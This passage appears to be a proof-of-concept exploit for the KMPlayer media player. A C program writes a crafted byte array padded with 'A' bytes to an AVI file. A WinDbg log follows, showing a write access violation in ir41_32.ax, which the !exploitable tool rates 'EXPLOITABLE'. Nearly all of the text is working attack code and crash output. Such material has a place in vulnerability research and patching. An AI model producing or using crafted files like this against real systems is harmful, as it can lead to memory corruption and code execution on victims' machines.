xF0,0x11,0x1F,0xE2,0x14,0x0D,0x66,0x49,0x9E,0x36,0x73,0x73,0xCE,0x5C,0x3C,0x3D,0x25,0x3B,0xB8,0x2E,0x46,0x3E,0x6E,0xB1,0x73,0xD6,0x9C,0x37,0x4F,0x79,0x11,0x15,0x6C,0x13,0x0F,0xB9,0xB3,0x92,0x0F,0x3D,0x72,0xE9,0xCC,0xD3,0x52,0x6E,0x79,0x5F,0xD8,0x1A,0x2C,0x11,0x13,0x59,0xF8,0x88,0xAD,0x8B,0xAD,0xB9,0x0C,0x43,0xDE,0xE7,0x10,0x1F,0x94,0x41,0x16,0xE5,0x23,0x13,0x4E,0x64,0xB1,0xF3,0x22,0xD4,0x27,0x0F,0x84,0xAB,0xE1,0x2B,0x71,0x36,0x10,0x1F,0x8F,0x6F,0x51,0x93,0x7C,0xEA,0xD5,0xE3,0x78,0xC7,0x65,0x55,0xF0,0x29,0x57,0x4B,0x56,0xAB,0x0E,0xF8,0x0C,0xC9,0x27,0xD4,0xA1,0xF8,0xF8,0x92,0x38,0xD8,0x72,0x46,0xF3,0x71,0xCD,0xE2,0xEA,0x48,0xEE,0x8A,0x2C,0xD6,0x62,0xE0,0x86,0x9D,0x8D,0x85,0xDB,0x62,0x2B,0xCE,0x08,0xF6,0x62,0xE6,0x8E,0xE0,0x2B,0x87,0xC5,0xA6,0xDC,0x71,0xCE,0x4D,0x31,0x72,0xC8,0x8B,0x67,0x4F,0x1E,0x09,0x2F,0x59,0x63,0x62,0x95,0x65,0xE2,0xFC,0x88,0xB3,0xE2,0xCC,0xE4,0x86,0x95,0x91,0xF7,0xC5,0x56,0xBC,0x3A,0x62,0x53,0xDE,0x90,0x0C,0xDC,0xBE,0xE6,0x8E,0x9D,0x2F,0xBB,0xDD,0x2C,0xFB,0xF1,0x3A,0x84,0x1F,0x2A,0xB3,0x79,0xB1,0x5E,0x9C,0x2F,0x9F,0xCD,0x77,0xA9,0x4F,0xB6,0x84,0xEF,0x86,0x47,0xF2,0xA2,0x32,0xB8,0x33,0x8B,0x1B,0x02,0x8B,0x85,0x20,0x10,0x59,0xD8,0x19,0x08,0x44,0x06,0x02,0x91,0x20,0x90,0x40,0xBE,0x79,0x1C,0x30,0x38,0x12,0x23,0xDB,0x47,0x24,0x1D,0xB1,0x58,0x8A,0x4D,0x9E,0x4B,0x14,0xC5,0x99,0x32,0xB2,0x29,0x1B,0x0B,0x16,0x03,0x03,0x12,0x24,0x0B,0x33,0x2B,0x12,0x2C,0x6C,0xCC,0x2C,0x2C,0x04,0x12,0x0C,0x24,0x81,0x04,0x12,0x48,0x10,0x24,0x03,0xF2,0x1D,0x8E,0x78,0xCA,0xC3,0x68,0x6E,0x26,0x16,0x4A,0x5E,0x75,0xF0,0x34,0x3B,0xF8,0x34,0x72,0xC5,0x2E,0x1B,0x1B,0x03,0x03,0x22,0x0B,0xE7,0x5C,0x71,0xCE,0xCA,0xC0,0xCC,0xC2,0x19,0x41,0x32,0x30,0x90,0x6C,0x04,0x03,0xC9,0x80,0x48,0x20,0x03,0x12,0x24,0x03,0x0D,0x0A,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
} ;
int _tmain(int argc, _TCHAR* argv[])
{
HANDLE fileHandle = INVALID_HANDLE_VALUE;
DWORD dwBytesWritten = 0;
fileHandle =
CreateFile(L"d:\\KmPoc.AVI",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
if(fileHandle == INVALID_HANDLE_VALUE)
{
printf("(-)Failed to Create File");
exit(0);
}else{
printf("(+) Writing File ...");
WriteFile(fileHandle,sc,sizeof(sc),&dwBytesWritten,NULL);
}
CloseHandle(fileHandle);
return 0;
return 0;
}
---------------------------------------------------------------------------------------
windbg result:
Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: c:\netw0rm\symbols
Executable search path is:
ModLoad: 00400000 00a60000 D:\THEKMP~1\KMPlayer.exe
ModLoad: 7c900000 7c9b2000 C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\oleaut32.dll
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll
ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\mpr.dll
ModLoad: 5edd0000 5ede7000 C:\WINDOWS\system32\olepro32.dll
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\shell32.dll
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 63000000 630e6000 C:\WINDOWS\system32\wininet.dll
ModLoad: 00390000 00399000 C:\WINDOWS\system32\Normaliz.dll
ModLoad: 1a400000 1a532000 C:\WINDOWS\system32\urlmon.dll
ModLoad: 5dca0000 5de88000 C:\WINDOWS\system32\iertutil.dll
ModLoad: 773d0000 774d3000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5705_x-ww_36cfed49\comctl32.dll
ModLoad: 73000000 73026000 C:\WINDOWS\system32\winspool.drv
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\winmm.dll
ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\wsock32.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76780000 76789000 C:\WINDOWS\system32\SHFolder.dll
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
ModLoad: 73760000 737ab000 C:\WINDOWS\system32\ddraw.dll
ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.dll
ModLoad: 73f10000 73f6c000 C:\WINDOWS\system32\dsound.dll
ModLoad: 76380000 76385000 C:\WINDOWS\system32\msimg32.dll
ModLoad: 58d40000 58d47000 C:\WINDOWS\system32\Wship6.dll
ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
ModLoad: 014c0000 01785000 C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 75f40000 75f51000 C:\WINDOWS\system32\devenum.dll
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll
ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 736b0000 736b7000 C:\WINDOWS\system32\msdmo.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 10000000 10008000 C:\Program Files\Internet Download
Manager\idmmkb.dll
ModLoad: 74810000 7497d000 C:\WINDOWS\system32\quartz.dll
ModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll
ModLoad: 10af0000 10b27000 C:\WINDOWS\system32\qasf.dll
ModLoad: 15610000 1578e000 C:\WINDOWS\system32\WMVDECOD.dll
ModLoad: 0bef0000 0bf27000 C:\WINDOWS\system32\MFPlat.DLL
ModLoad: 471b0000 47211000 C:\WINDOWS\system32\qdvd.dll
ModLoad: 73940000 73a10000 C:\WINDOWS\system32\D3DIM700.DLL
ModLoad: 580b0000 58188000 C:\WINDOWS\system32\ir41_32.ax
(910.380): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\WINDOWS\system32\ntdll.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\WINDOWS\system32\ir41_32.ax -
eax=04000400 ebx=0b76e8e0 ecx=001cf480 edx=00000000 esi=00000000
edi=ff9fff9f
eip=580ef04c esp=0ba3fb2c ebp=0000000d iopl=0 nv up ei pl zr na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000246
ir41_32!ConfigureDialogProc+0x366c:
580ef04c 8907 mov dword ptr [edi],eax
ds:0023:ff9fff9f=????????
0:014> .load winext/MSEC.dll
0:014> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at
ir41_32!ConfigureDialogProc+0x000000000000366c (Hash=0x17103451.0x2940d134)
User mode write access violations that are not near NULL are exploitable.
|